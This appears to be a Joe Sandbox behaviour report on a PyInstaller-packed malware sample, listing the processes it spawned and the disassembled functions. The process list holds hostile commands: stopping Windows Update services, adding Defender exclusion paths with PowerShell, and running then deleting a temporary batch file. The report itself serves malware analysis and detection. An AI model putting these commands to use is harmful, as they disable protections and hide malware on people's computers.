Start time:	21:56:32
Start date:	04/06/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "ver"
Imagebase:	0x7ff70ed80000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	21:56:32
Start date:	04/06/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	42
Start time:	21:56:32
Start date:	04/06/2024
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc stop WaaSMedicSvc
Imagebase:	0x7ff6b7320000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	43
Start time:	21:56:32
Start date:	04/06/2024
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc stop wuauserv
Imagebase:	0x7ff6b7320000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	44
Start time:	21:56:32
Start date:	04/06/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Local\Temp\tmp3F5C.tmp.bat & Del C:\Users\user\AppData\Local\Temp\tmp3F5C.tmp.bat
Imagebase:	0x7ff70ed80000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	45
Start time:	21:56:32
Start date:	04/06/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	46
Start time:	21:56:32
Start date:	04/06/2024
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc stop bits
Imagebase:	0x7ff6b7320000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	47
Start time:	21:56:32
Start date:	04/06/2024
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	Tasklist /fi "PID eq 5064"
Imagebase:	0x7ff633870000
File size:	106'496 bytes
MD5 hash:	D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	48
Start time:	21:56:32
Start date:	04/06/2024
Path:	C:\Windows\System32\find.exe
Wow64 process (32bit):	false
Commandline:	find ":"
Imagebase:	0x7ff7fd3b0000
File size:	17'920 bytes
MD5 hash:	4BF76A28D31FC73AA9FC970B22D056AF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	49
Start time:	21:56:33
Start date:	04/06/2024
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc stop dosvc
Imagebase:	0x7ff6b7320000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	50
Start time:	21:56:33
Start date:	04/06/2024
Path:	C:\Windows\System32\dialer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\dialer.exe
Imagebase:	0x7ff7f0870000
File size:	39'936 bytes
MD5 hash:	B2626BDCF079C6516FC016AC5646DF93
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	52
Start time:	21:56:33
Start date:	04/06/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	55
Start time:	21:56:33
Start date:	04/06/2024
Path:	C:\Windows\System32\winlogon.exe
Wow64 process (32bit):	false
Commandline:	winlogon.exe
Imagebase:	0x7ff7cd660000
File size:	906'240 bytes
MD5 hash:	F8B41A1B3E569E7E6F990567F21DCE97
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	56
Start time:	21:56:34
Start date:	04/06/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "wmic os get Caption"
Imagebase:	0x7ff70ed80000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	57
Start time:	21:56:34
Start date:	04/06/2024
Path:	C:\Windows\System32\timeout.exe
Wow64 process (32bit):	false
Commandline:	Timeout /T 1 /Nobreak
Imagebase:	0x7ff7e6c40000
File size:	32'768 bytes
MD5 hash:	100065E21CFBBDE57CBA2838921F84D6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	58
Start time:	21:56:34
Start date:	04/06/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	61
Start time:	21:56:34
Start date:	04/06/2024
Path:	C:\Program Files\Google\Chrome\updater.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\updater.exe"
Imagebase:	0x7ff74a170000
File size:	5'617'152 bytes
MD5 hash:	1274CBCD6329098F79A3BE6D76AB8B97
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 88%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	62
Start time:	21:56:34
Start date:	04/06/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic os get Caption
Imagebase:	0x7ff6c5c80000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	63
Start time:	21:56:34
Start date:	04/06/2024
Path:	C:\Windows\System32\lsass.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\lsass.exe
Imagebase:	0x7ff7a2ae0000
File size:	59'456 bytes
MD5 hash:	A1CC00332BBF370654EE3DC8CDC8C95A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	64
Start time:	21:56:34
Start date:	04/06/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	65
Start time:	21:56:34
Start date:	04/06/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	66
Start time:	21:56:35
Start date:	04/06/2024
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	Tasklist /fi "PID eq 5064"
Imagebase:	0x7ff633870000
File size:	106'496 bytes
MD5 hash:	D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	67
Start time:	21:56:35
Start date:	04/06/2024
Path:	C:\Windows\System32\find.exe
Wow64 process (32bit):	false
Commandline:	find ":"
Imagebase:	0x7ff7fd3b0000
File size:	17'920 bytes
MD5 hash:	4BF76A28D31FC73AA9FC970B22D056AF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	68
Start time:	21:56:36
Start date:	04/06/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
Imagebase:	0x7ff6eef20000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	69
Start time:	21:56:36
Start date:	04/06/2024
Path:	C:\Windows\System32\timeout.exe
Wow64 process (32bit):	false
Commandline:	Timeout /T 1 /Nobreak
Imagebase:	0x7ff7e6c40000
File size:	32'768 bytes
MD5 hash:	100065E21CFBBDE57CBA2838921F84D6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	70
Start time:	21:56:37
Start date:	04/06/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
Imagebase:	0x7ff70ed80000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	71
Start time:	21:56:37
Start date:	04/06/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	72
Start time:	21:56:37
Start date:	04/06/2024
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	Tasklist /fi "PID eq 5064"
Imagebase:	0x7ff633870000
File size:	106'496 bytes
MD5 hash:	D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	73
Start time:	21:56:37
Start date:	04/06/2024
Path:	C:\Windows\System32\find.exe
Wow64 process (32bit):	false
Commandline:	find ":"
Imagebase:	0x7ff7fd3b0000
File size:	17'920 bytes
MD5 hash:	4BF76A28D31FC73AA9FC970B22D056AF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	96
Start time:	21:56:38
Start date:	04/06/2024
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	244
Start time:	21:56:39
Start date:	04/06/2024
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	274
Start time:	21:56:40
Start date:	04/06/2024
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	300
Start time:	21:56:47
Start date:	04/06/2024
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	320
Start time:	21:57:02
Start date:	04/06/2024
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	325
Start time:	21:57:05
Start date:	04/06/2024
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	10.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	23.4%
Total number of Nodes:	2000
Total number of Limit Nodes:	56

Executed Functions

Function 00007FF6CEB21000 Relevance: 21.3, APIs: 5, Strings: 7, Instructions: 293
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF6CEB23F00: GetModuleFileNameW.KERNEL32(?,00007FF6CEB239CA), ref: 00007FF6CEB23F34

SetDllDirectoryW.KERNEL32 ref: 00007FF6CEB23BD5
PostMessageW.USER32 ref: 00007FF6CEB23CC3
GetMessageW.USER32 ref: 00007FF6CEB23CD6
PostMessageW.USER32 ref: 00007FF6CEB23D61
GetMessageW.USER32 ref: 00007FF6CEB23D74

Part of subcall function 00007FF6CEB27D70: GetEnvironmentVariableW.KERNEL32(00007FF6CEB239FF), ref: 00007FF6CEB27DAA
Part of subcall function 00007FF6CEB27D70: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF6CEB27DC7

Strings

Cannot side-load external archive %s (code %d)!, xrefs: 00007FF6CEB23B1F
Cannot open PyInstaller archive from executable (%s) or external archive (%s), xrefs: 00007FF6CEB23AA6
MEI, xrefs: 00007FF6CEB23ADA
_MEIPASS2, xrefs: 00007FF6CEB239EB, 00007FF6CEB23A54, 00007FF6CEB23D32, 00007FF6CEB23D3E
Failed to convert DLL search path!, xrefs: 00007FF6CEB23BC5
_PYI_ONEDIR_MODE, xrefs: 00007FF6CEB23A14, 00007FF6CEB23A3F
Failed to initialize security descriptor for temporary directory!, xrefs: 00007FF6CEB23B53

Memory Dump Source

Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true

Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd

Similarity

API ID: Message$EnvironmentPost$DirectoryExpandFileModuleNameStringsVariable
String ID: Cannot open PyInstaller archive from executable (%s) or external archive (%s)$Cannot side-load external archive %s (code %d)!$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$MEI$_MEIPASS2$_PYI_ONEDIR_MODE
API String ID: 2647325126-1544818733
Opcode ID: bd414e0ba7d804e29e6718c27cc7e8acd751ab09fec9afdc79f0f04ad45cb119
Instruction ID: 72d59390b17211a9c6e83872396d39026dc85c01947fb7d3d86638752c770c25
Opcode Fuzzy Hash: bd414e0ba7d804e29e6718c27cc7e8acd751ab09fec9afdc79f0f04ad45cb119
Instruction Fuzzy Hash: EBC19222F1C68741FA29EF2196592BD6271BF76786F400132FACDE769ADF2CE5058700

Function 00007FF6CEB46B50 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 334
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_get_daylight.LIBCMT ref: 00007FF6CEB46B95

Part of subcall function 00007FF6CEB464E8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6CEB464FC

Part of subcall function 00007FF6CEB3B700: RtlRestoreThreadPreferredUILanguages.NTDLL(?,?,?,00007FF6CEB43B72,?,?,?,00007FF6CEB43BAF,?,?,00000000,00007FF6CEB44075,?,?,00000000,00007FF6CEB43FA7), ref: 00007FF6CEB3B716
Part of subcall function 00007FF6CEB3B700: GetLastError.KERNEL32(?,?,?,00007FF6CEB43B72,?,?,?,00007FF6CEB43BAF,?,?,00000000,00007FF6CEB44075,?,?,00000000,00007FF6CEB43FA7), ref: 00007FF6CEB3B720

Part of subcall function 00007FF6CEB3B6B8: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF6CEB3B697,?,?,?,?,?,00007FF6CEB338BC), ref: 00007FF6CEB3B6C1
Part of subcall function 00007FF6CEB3B6B8: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF6CEB3B697,?,?,?,?,?,00007FF6CEB338BC), ref: 00007FF6CEB3B6E6

_get_daylight.LIBCMT ref: 00007FF6CEB46B84

Part of subcall function 00007FF6CEB46548: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6CEB4655C

_get_daylight.LIBCMT ref: 00007FF6CEB46DFA
_get_daylight.LIBCMT ref: 00007FF6CEB46E0B
_get_daylight.LIBCMT ref: 00007FF6CEB46E1C
GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF6CEB4705C), ref: 00007FF6CEB46E43

Strings

Eastern Summer Time, xrefs: 00007FF6CEB46F01
Eastern Standard Time, xrefs: 00007FF6CEB46EE9

Memory Dump Source

Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true

Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd

Similarity

API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureInformationLanguagesLastPreferredPresentProcessProcessorRestoreThreadTimeZone
String ID: Eastern Standard Time$Eastern Summer Time
API String ID: 1458651798-239921721
Opcode ID: 011d4974f3e124412289dc327b2b40947a146d65b03f6d5f747eb19bebd0a963
Instruction ID: 4c6107a5b67ef2a8cf3e0f5a23e0de497d5fa635fd1582dbd2e33d89b3949da8
Opcode Fuzzy Hash: 011d4974f3e124412289dc327b2b40947a146d65b03f6d5f747eb19bebd0a963
Instruction Fuzzy Hash: 43D1E122A0861386EB24AF25D6911B96371FF66B86F444036FACDE7A99DF3CE441C740

Function 00007FF6CEB47A9C Relevance: 13.8, APIs: 9, Instructions: 276
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF6CEB477D0: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6CEB47811
Part of subcall function 00007FF6CEB477D0: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6CEB4788F
Part of subcall function 00007FF6CEB477D0: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6CEB478E0

CreateFileW.KERNELBASE ref: 00007FF6CEB47BA2
CreateFileW.KERNEL32 ref: 00007FF6CEB47BF2
GetLastError.KERNEL32 ref: 00007FF6CEB47C22
GetFileType.KERNELBASE ref: 00007FF6CEB47C37
GetLastError.KERNEL32 ref: 00007FF6CEB47C41
CloseHandle.KERNEL32 ref: 00007FF6CEB47C74
CloseHandle.KERNEL32 ref: 00007FF6CEB47DD7
CreateFileW.KERNEL32 ref: 00007FF6CEB47E0C
GetLastError.KERNEL32 ref: 00007FF6CEB47E1B

Memory Dump Source

Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true

Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd

Similarity

API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
String ID:
API String ID: 1617910340-0
Opcode ID: 8482aad9305a30c551bfc572177b6762c68ebfb4afe3bdfce811c5be068ed5ba
Instruction ID: 5fc4e276096950c4451c8325862d6f16519f77a08c1bed140287d8fc93793611
Opcode Fuzzy Hash: 8482aad9305a30c551bfc572177b6762c68ebfb4afe3bdfce811c5be068ed5ba
Instruction Fuzzy Hash: 04C1C137B28B5286EB10CF64C5916BC3771EB5AB99B000326EA9EA73D5CF38E455C700

Function 00007FF6CEB27B60 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 141
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTempPathW.KERNEL32(00000000,?,00000000,00000000,?,00007FF6CEB2153F), ref: 00007FF6CEB27BF7

Part of subcall function 00007FF6CEB27D70: GetEnvironmentVariableW.KERNEL32(00007FF6CEB239FF), ref: 00007FF6CEB27DAA
Part of subcall function 00007FF6CEB27D70: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF6CEB27DC7

Part of subcall function 00007FF6CEB38610: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6CEB38629

SetEnvironmentVariableW.KERNEL32 ref: 00007FF6CEB27CB1

Part of subcall function 00007FF6CEB22B10: MessageBoxW.USER32 ref: 00007FF6CEB22BE5

Strings

TMP, xrefs: 00007FF6CEB27BC0
_MEI%d, xrefs: 00007FF6CEB27C05
TMP, xrefs: 00007FF6CEB27B9A, 00007FF6CEB27C59, 00007FF6CEB27CE7
LOADER: Failed to set the TMP environment variable., xrefs: 00007FF6CEB27BDA

Memory Dump Source

Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true

Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd

Similarity

API ID: Environment$Variable$ExpandMessagePathStringsTemp_invalid_parameter_noinfo
String ID: LOADER: Failed to set the TMP environment variable.$TMP$TMP$_MEI%d
API String ID: 3752271684-1116378104
Opcode ID: c156423b33866011d019db228dcac7379af2ead993036b2191ec76f2d14005c3
Instruction ID: a89d22b2784ddd1c2578bbf6f4ff9cb1a204a404ac1f176de99a327cfdb8bcf1
Opcode Fuzzy Hash: c156423b33866011d019db228dcac7379af2ead993036b2191ec76f2d14005c3
Instruction Fuzzy Hash: A0518211B0975342FA14AF22AB1A2BA52616F77BC2F485435FD8EFB787ED2CE4018604

Function 00007FF6CEB2A76D Relevance: 12.0, Strings: 9, Instructions: 745COMMON

Download Yara Rule

Strings

invalid distances set, xrefs: 00007FF6CEB2AC60
invalid code -- missing end-of-block, xrefs: 00007FF6CEB2AB86
invalid literal/length code, xrefs: 00007FF6CEB2AEA2
too many length or distance symbols, xrefs: 00007FF6CEB2A906
invalid bit length repeat, xrefs: 00007FF6CEB2AB59
invalid distance code, xrefs: 00007FF6CEB2B074
invalid distance too far back, xrefs: 00007FF6CEB2B130
invalid literal/lengths set, xrefs: 00007FF6CEB2ABF3
invalid code lengths set, xrefs: 00007FF6CEB2A8ED

Memory Dump Source

Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true

Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd

Similarity

API ID:
String ID: invalid bit length repeat$invalid code -- missing end-of-block$invalid code lengths set$invalid distance code$invalid distance too far back$invalid distances set$invalid literal/length code$invalid literal/lengths set$too many length or distance symbols
API String ID: 0-2665694366
Opcode ID: 63f3ffa9379e1e3dea1ad36e367ec88dcfea323b25a29ef61fa4fbcfb838a92b
Instruction ID: e90c45dfcfec1dee6f505f06b181eacf6a1783fb816b8d6e19643d5e97c34d9f
Opcode Fuzzy Hash: 63f3ffa9379e1e3dea1ad36e367ec88dcfea323b25a29ef61fa4fbcfb838a92b
Instruction Fuzzy Hash: EA52D372A146A68BD7648F14D69CB7E3BB9EF65341F024139E68AA7780DF3CD844CB40

Function 00007FF6CEB46DCC Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 143
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_get_daylight.LIBCMT ref: 00007FF6CEB46DFA

Part of subcall function 00007FF6CEB46548: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6CEB4655C

_get_daylight.LIBCMT ref: 00007FF6CEB46E0B

Part of subcall function 00007FF6CEB464E8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6CEB464FC

_get_daylight.LIBCMT ref: 00007FF6CEB46E1C

Part of subcall function 00007FF6CEB46518: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6CEB4652C

Part of subcall function 00007FF6CEB3B700: RtlRestoreThreadPreferredUILanguages.NTDLL(?,?,?,00007FF6CEB43B72,?,?,?,00007FF6CEB43BAF,?,?,00000000,00007FF6CEB44075,?,?,00000000,00007FF6CEB43FA7), ref: 00007FF6CEB3B716
Part of subcall function 00007FF6CEB3B700: GetLastError.KERNEL32(?,?,?,00007FF6CEB43B72,?,?,?,00007FF6CEB43BAF,?,?,00000000,00007FF6CEB44075,?,?,00000000,00007FF6CEB43FA7), ref: 00007FF6CEB3B720

